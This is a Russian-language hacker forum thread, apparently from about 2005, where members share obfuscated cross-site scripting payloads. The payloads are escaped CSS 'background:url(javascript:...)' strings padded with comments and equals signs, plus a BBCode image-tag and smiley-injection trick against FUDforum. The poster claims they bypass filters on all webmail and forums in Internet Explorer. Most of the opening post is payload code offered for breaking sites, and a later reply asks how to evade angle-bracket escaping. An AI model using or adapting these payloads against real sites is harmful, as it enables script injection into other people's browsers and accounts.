Эти структуры, проверял, работают на ВСЕХ и-мейлах как и на Русских, так и на Английских. Все что нужно, так это разрушить структуру тегов, что не смешите меня, для меня и для знающих, пустяки. На форуме труднее ломать структуру, чем на и-мейлах. HTML: <html><body><a href=www. style="back\g\r\o\u\nd:\u\r\l\(\javasc\r\i\p\t\:a\le\r\t\(\'\w\j\'\)\)" >wj<a></body></html> HTML: <html><body><a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**/'\w\j\'/**/\/**/)/**/\/**/)" >wj<a></body></html> HTML: <html><body><a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**//\w\j\//**/\/**/)/**/\/**/)" >wj<a></body></html> without single (') quotes. HTML: <html><body><a href=www. style=/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**//\w\j\//**/\/**/)/**/\/**/) >wj<a></body></html> without single (') or double (") quotes. HTML: <html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*//\w\j\//**/\/**/)/**/\/**/) >wj<a></body></html> With equals sign. (=) (=) HTML: <html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*/'\w\j\'/*=*=/=\=/=*=*/)/*=*=/=\=/=*=*/) >wj<a></body></html> With equals sign and single quotes. (=) (=) (') HTML: <html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*=/='=\=w=\=j=\='=/=*=*=/=\=/=*=*/)/*=*=/=\==/=*=*/) >wj<a></body></html> With equals sign and single quotes, but text inside the alert box, omitted. (=) (=) (') Просто интересно, что случается в этой комбинации для знающих. Легче всего просматривать в Фаерфоксе. HTML: <html><img src="blah.gif" <onchange="alert('you cli=cked me')"></body></html> и HTML: <html><img src="blah.gif" <onchange="alert('you clicked me')"></body></html> Вообщем не один фильтр, эти комбинации не палит, и можете это все проверить на locahost. Все это проверялось, и все это вы можете проверить и сами, открыв блокнот, copy/paste одну из комбинаций моих кодов как и есть, и сохранить как filename.html Работает только в браузере ИЕ. А вот и моя коронка...... HTML: <html><img src="blah.gif" <span style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*/'\w\j\'/*=*=/=\=/=*=*/)/*=*=/=\=/=*=*/) me')" <img src="blah.gif" <onchange="alert('you cli=cked me')">></body></html>
wj есть то что в чем ты еще нечего ненашол ну или неписал просто ето FUDforum новый естественно ----------------------------------------------------- з.ы. еще пару статей и будет готов твои психологический портрет!-)
Ладно, ты прав...так уж и быть имхо. Должен сказать, что проверив почти все комбинации тегов, Я нашёл, что они ОЧЕНЬ сильно защищены имхо....ни в одном теги не проходит другой тег, и ни во едином теги не проходит двойная кавычка. Но вот в чём фишка....во ВСЕХ тегах, проходит смайлик.... Что ну и что? А то, что вы сами теперь можете создавать свой смайлик и ломать через него...это типа, для выкрутасывания... +) Ну а вот и сам код алёрта, HTML: [img]java script:alert().gif[/img] В теге, использована табуляция....как её создать? Открываем блокнот, и жмём кнопочку Через код который Я вам дал, можно создать свой смайлик и ломать через него....хотя Я пока сам не пробовал, так как это просто идея такая пришла когда засыпал и нужды толком так и не было к этому методу прибегать. И ещё, во всех тегах проходят одинарная кавычка, ('), и апостроф (`), так что создать свой смаилик и через него ломать через любой тег, проблем существовать не должно. Не забудьте, что смайлик работать не будет, если до смайлика и после, не будет стоять точка. (.) Пример, HTML: [img]http://www.wj.8).gif[/img] Результат, HTML: <img src="http://www.wj.<img src="images/smiley_icons/icon_cool.gif" border=0 alt="Cool">.gif" border=0 alt="http://www.wj.<img src="images/smiley_icons/icon_cool.gif" border=0 alt="Cool">.gif"> Код тестился на форуме разработчиков форума, в версии ИЕ6.
не я чото помню часика 2 тоже сморел чото вышло кривое непомню уже теперь на старой версии ну со смайликами чото уж сильно замученно --з.ы.-- зато я знаю где ты ненайдешь нечего такой вот супер пупер мега куль форум-)
парни такая проблема вот ввожу я HTML: <script>alert()</script> в хтмл пишет HTML: <script>alert()</script> значит он фильтрует > и добавляет после них ; как мне это обойти помогите плиз незнаю куда обратится просто .
Ну ты и чайник... 1) Не туда запостил, это раздел СТАТЬИ. 2) < и > - это спец. символы, о которых ты явно не слышал... =\
А я и неговорил что умный темболее что < как я понел это < и > это > вот и спросил что нужно добавить чтоб не фильтровал =\
а реально перенести мтатью в раздел юиора болталка например ? я кислоты скушаю тоже поделюсь своими наблюдениями
Заметка то по сути гениальная! . Особенно для 2005 года. p.s. С ностальгией: Джордан, джордан... куда же ты пропал!
